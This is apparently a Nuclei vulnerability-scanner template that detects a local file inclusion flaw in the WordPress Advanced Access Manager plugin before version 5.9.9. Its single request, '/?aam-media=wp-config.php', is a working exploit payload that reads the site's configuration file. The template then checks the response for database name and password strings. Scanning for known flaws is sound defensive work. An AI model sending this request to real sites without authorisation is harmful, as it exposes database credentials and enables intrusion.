Description
WordPress Advanced Access Manager versions before 5.9.9 are vulnerable to local file inclusion and allows attackers to download the wp-config.php file and get access to the database, which is publicly reachable on many servers.
WordPress Advanced Access Manager versions before 5.9.9 are vulnerable to local file inclusion and allows attackers to download the wp-config.php file and get access to the database, which is publicly reachable on many servers.
id: advanced-access-manager-lfi
info:
name: WordPress Advanced Access Manager < 5.9.9 - Local File Inclusion
author: 0x_Akoko
severity: high
description: |
WordPress Advanced Access Manager versions before 5.9.9 are vulnerable to local file inclusion and allows attackers to download the wp-config.php file and get access to the database, which is publicly reachable on many servers.
reference:
- https://wpscan.com/vulnerability/9873
- https://id.wordpress.org/plugins/advanced-access-manager/
- https://wpscan.com/vulnerability/dfe62ff5-956c-4403-b3fd-55677628036b
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22,CWE-73
metadata:
max-request: 1
tags: wordpress,wp-plugin,lfi,wp,accessmanager,wpscan,vuln
http:
- method: GET
path:
- '{{BaseURL}}/?aam-media=wp-config.php'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "DB_NAME"
- "DB_PASSWORD"
condition: and
- type: status
status:
- 200
# digest: 490a004630440220657f8b815d24b53046db84eff7fa2e1692026d56714e873951e5139e787d8c5a022074819dd0053d2d72dc638c72a3ceac52c7d590a75cf3f74580c93ef667650c64:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.